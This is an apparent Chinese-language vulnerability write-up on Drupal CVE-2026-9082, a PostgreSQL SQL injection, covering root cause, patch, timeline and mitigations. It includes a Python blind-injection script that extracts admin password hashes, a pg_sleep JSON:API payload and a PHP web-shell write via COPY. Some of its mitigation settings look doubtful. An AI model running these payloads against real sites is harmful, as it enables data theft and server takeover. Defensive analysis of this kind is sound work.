一、事件概述48小时引爆全球的完美风暴2026年5月20日Drupal官方发布紧急安全公告SA-CORE-2026-004披露了一个存在于核心数据库抽象层的高危SQL注入漏洞CVE-2026-9082。这一漏洞被Drupal安全团队评为23/25极高危是近五年来Drupal最严重的安全漏洞之一。与以往漏洞不同的是CVE-2026-9082具备了完美风暴的所有特征未认证可远程利用攻击者无需任何账号权限即可触发低门槛利用仅需发送一个简单的HTTP请求快速武器化补丁发布当天即有完整PoC公开全球范围攻击48小时内监测到超过15,000次攻击尝试覆盖65个国家和地区高价值目标集中游戏、金融、政府和教育行业成为首要攻击目标占比超过60%截至5月25日全球已有近6,000个Drupal站点被确认受到攻击其中包括多个政府机构和大型企业的官方网站。CISA已将该漏洞加入已知被利用漏洞KEV目录并要求联邦机构在72小时内完成修复。二、漏洞速览关键信息一目了然项目详情CVE编号CVE-2026-9082Drupal公告SA-CORE-2026-004漏洞类型SQL注入CWE-89攻击向量远程未认证影响范围Drupal 8.9.0–11.3.9仅PostgreSQL数据库不受影响MySQL/MariaDB、SQLite、SQL Server、Drupal 7.x风险评级Drupal23/25极高危CVSSv36.5核心危害数据泄露、权限提升、特定配置下远程代码执行攻击入口JSON登录接口、JSON:API过滤参数修复版本11.3.10、11.2.12、11.1.10、10.6.9、10.5.10、10.4.10三、深度技术分析数据库抽象层的致命缺陷3.1 漏洞根源信任了不该信任的数组键名Drupal的数据库抽象层本应是防SQL注入的第一道防线但本次漏洞恰恰出现在这个核心组件中。问题源于PostgreSQL EntityQuery条件处理器对用户可控数据的错误信任。PostgreSQL默认是大小写敏感的为了实现与MySQL一致的不区分大小写查询行为Drupal在处理PostgreSQL查询时会使用LOWER()函数包裹字段和值。当查询条件是一个数组时Drupal会为每个数组元素生成一个SQL占位符。漏洞代码简化版// Drupal\Core\Database\Driver\pgsql\Select.phpprotectedfunctionconditionToString($condition){// ... 其他代码 ...// 漏洞点直接使用用户可控的数组键名作为占位符后缀foreach($condition[value]as$key$value){$placeholder:db_condition_placeholder_.$this-nextPlaceholder;$this-arguments[$placeholder]$value;$placeholders[]$placeholder;}// 生成SQL片段returnLOWER(.$field.) IN (.implode(, ,$placeholders).);}问题所在当攻击者传入一个关联数组时数组的键名会被直接拼接到SQL语句中作为占位符名称的一部分。由于Drupal没有对数组键名进行任何过滤或验证攻击者可以在键名中插入任意SQL代码。3.2 漏洞触发流程图攻击者发送恶意请求PHP将JSON解码为关联数组数组传递给EntityQuery条件处理器循环遍历数组使用键名构造占位符恶意SQL代码被直接拼接到SQL语句PostgreSQL执行恶意SQLSQL注入成功3.3 漏洞触发条件要成功触发CVE-2026-9082必须同时满足以下四个条件Drupal站点使用PostgreSQL作为数据库后端Drupal版本在8.9.0到11.3.9之间攻击者可控的输入能够到达EntityQuery条件处理器查询条件使用了不区分大小写的比较LIKE、IN等四、完整利用链从SQL注入到服务器接管4.1 两个未认证利用入口攻击者可以通过两个完全未认证的入口触发漏洞这两个入口在绝大多数Drupal站点中都是默认开启的。入口1JSON登录接口/user/login?_formatjson这是最通用的利用方式适用于所有开启了JSON登录的Drupal站点。攻击者可以在name参数中传入一个JSON对象其键名包含恶意SQL代码。PoC代码布尔盲注importrequestsimportstringdefextract_admin_password(target):charsetstring.ascii_lettersstring.digits$./passwordforiinrange(1,65):# Drupal密码哈希长度为64个字符forcincharset:urlf{target}/user/login?_formatjsonpayload{name:{f1) OR (SUBSTRING(pass,{i},1){c} AND uid1)-- :admin},pass:test}try:responserequests.post(url,jsonpayload,timeout5)# 如果条件为真服务器返回400错误否则返回401错误ifresponse.status_code400:passwordcprint(f已提取{password})breakexceptExceptionase:print(f请求失败{e})continuereturnpassword# 使用示例# admin_password extract_admin_password(https://example.com)# print(f管理员密码哈希{admin_password})入口2JSON:API过滤参数/jsonapi/node/{bundle}对于开启了JSON:API模块的站点攻击者可以通过GET请求的filter参数触发漏洞。这种方式更加隐蔽因为它不需要发送POST请求且可以在单个请求中完成指纹识别和注入测试。PoC请求示例GET /jsonapi/node/article?filter[title][value][0||(SELECT pg_sleep(5))--]test HTTP/1.1 Host: example.com Accept: application/vnd.apijson4.2 完整攻击链发送恶意SQL注入请求提取管理员用户名和密码哈希破解密码哈希或直接创建新管理员账号登录Drupal后台编辑Twig模板执行PHP代码上传WebShell完全控制服务器4.3 RCE条件说明虽然官方提到了RCE风险但需要满足以下条件之一Twig模板编辑权限攻击者成功获取管理员权限后可以通过编辑Twig模板执行任意PHP代码默认开启PostgreSQL超级用户权限如果PostgreSQL数据库账号拥有超级用户权限攻击者可以利用COPY FROM PROGRAM功能直接执行系统命令文件写入权限攻击者可以通过SQL注入写入恶意文件到Web可访问目录PostgreSQL COPY FROM PROGRAM RCE示例COPY(SELECT?php system($_GET[cmd]); ?)TO/var/www/html/shell.php;五、在野利用现状截至5月25日5.1 攻击时间线5月18日Drupal发布公共服务公告PSA警告即将发布一个极高危漏洞补丁5月20日18:00 UTCDrupal官方发布安全公告和补丁5月20日20:00 UTC首个技术分析文章发布5月20日22:00 UTC完整PoC代码在GitHub公开5月21日06:00 UTCNuclei检测模板发布自动化扫描开始5月21日12:00 UTC监测到首批在野攻击5月22日12:00 UTC48小时内全球攻击次数突破15,000次5月23日CISA将该漏洞加入KEV目录5月25日确认近6,000个站点被入侵5.2 攻击目标分布根据全球安全厂商的监测数据攻击目标主要集中在以下行业游戏行业28%高价值数据、支付系统金融行业21%用户信息、交易数据政府机构17%敏感信息、基础设施教育机构14%学生数据、研究成果媒体与娱乐10%其他10%5.3 在野攻击特征目前在野攻击主要表现出以下特征优先探测/jsonapi/node/*端点因为它不需要POST请求大量请求包含nuclei_sa_core_2026_004标记攻击者使用自动化工具批量扫描互联网成功入侵后攻击者会立即创建后门管理员账号部分攻击者会植入WebShell和挖矿程序六、补丁分析七行代码拯救百万站点Drupal官方的修复方案非常简洁但极其有效使用array_values()函数剥离用户可控的数组键名强制转换为数字索引数组。补丁代码核心部分diff --git a/core/lib/Drupal/Core/Database/Driver/pgsql/Select.php b/core/lib/Drupal/Core/Database/Driver/pgsql/Select.php index 8a7b3c9d..e6f5a4b2 100644 --- a/core/lib/Drupal/Core/Database/Driver/pgsql/Select.php b/core/lib/Drupal/Core/Database/Driver/pgsql/Select.php -326,7 326,7 protected function conditionToString($condition) { $operator ; } - foreach ($condition[value] as $key $value) { foreach (array_values($condition[value]) as $key $value) { $placeholder :db_condition_placeholder_ . $this-nextPlaceholder; $this-arguments[$placeholder] $value; $placeholders[] $placeholder;修复原理array_values()函数会返回数组中所有的值并重新索引为从0开始的数字索引。这样无论攻击者传入什么样的关联数组键名都会被丢弃确保占位符名称始终是安全的数字。Drupal在三个不同的文件中应用了相同的修复覆盖了所有可能触发漏洞的代码路径。七、紧急修复与缓解措施7.1 升级唯一彻底方案所有使用PostgreSQL的Drupal站点必须立即升级到以下安全版本Drupal 11.3.x →11.3.10Drupal 11.2.x →11.2.12Drupal 11.1.x →11.1.10EOL紧急版本Drupal 10.6.x →10.6.9Drupal 10.5.x →10.5.10Drupal 10.4.x →10.4.10EOL紧急版本Drupal 9.5.x/8.9.x手动应用官方补丁7.2 临时缓解措施无法升级时如果暂时无法升级可以采取以下临时缓解措施禁用JSON登录接口在settings.php中添加以下代码$settings[jsonapi_include]FALSE;$settings[rest_enabled]FALSE;禁用JSON:API模块在Drupal后台的扩展页面中禁用JSON:API模块WAF拦截规则配置WAF拦截以下特征/user/login?_formatjson的POST请求中包含JSON对象/jsonapi/*的GET请求中包含filter参数且值为数组请求参数中包含||、--、SELECT、UNION等SQL关键字限制PostgreSQL权限确保Drupal使用的PostgreSQL账号不是超级用户且没有文件读写权限7.3 入侵检测与响应如果怀疑站点已经被入侵请立即执行以下操作断开服务器网络连接备份所有数据和日志检查管理员账号列表删除可疑账号检查文件系统查找WebShell和恶意文件检查数据库查找恶意数据升级到安全版本重置所有用户密码恢复到未被入侵的备份如果有八、自查清单✅ 您的Drupal站点是否使用PostgreSQL数据库✅ Drupal版本是否在8.9.0到11.3.9之间✅ 是否开启了JSON登录接口✅ 是否开启了JSON:API模块✅ 近7天的访问日志中是否有异常请求✅ 管理员账号列表中是否有可疑账号✅ 文件系统中是否有最近修改的PHP文件九、前瞻性思考数据库抽象层的安全隐患CVE-2026-9082暴露了一个长期被忽视的安全问题数据库抽象层的安全假设可能不成立。长期以来开发者普遍认为使用数据库抽象层和参数化查询就可以完全避免SQL注入。但本次漏洞表明即使使用了参数化查询如果抽象层本身存在设计缺陷仍然可能导致SQL注入。本次漏洞给我们的启示不要信任任何用户输入包括数组键名、HTTP头、Cookie等看似安全的输入数据库抽象层不是万能的定期审计抽象层的代码特别是数据库特定的实现最小权限原则数据库账号只授予必要的权限禁止使用超级用户深度防御在应用层、WAF层和网络层都部署安全防护措施快速响应建立完善的漏洞响应机制确保在漏洞披露后能够快速修复十、总结CVE-2026-9082是Drupal近五年来最危险的漏洞之一。它具备未认证、低门槛、快速武器化等特点导致在补丁发布后48小时内就在全球范围内爆发。所有使用PostgreSQL的Drupal站点必须立即采取行动要么升级到安全版本要么采取临时缓解措施。否则极有可能在短时间内被攻击者入侵导致数据泄露、服务器被接管等严重后果。网络安全是一场永无止境的战争。只有保持警惕不断学习才能在这场战争中立于不败之地。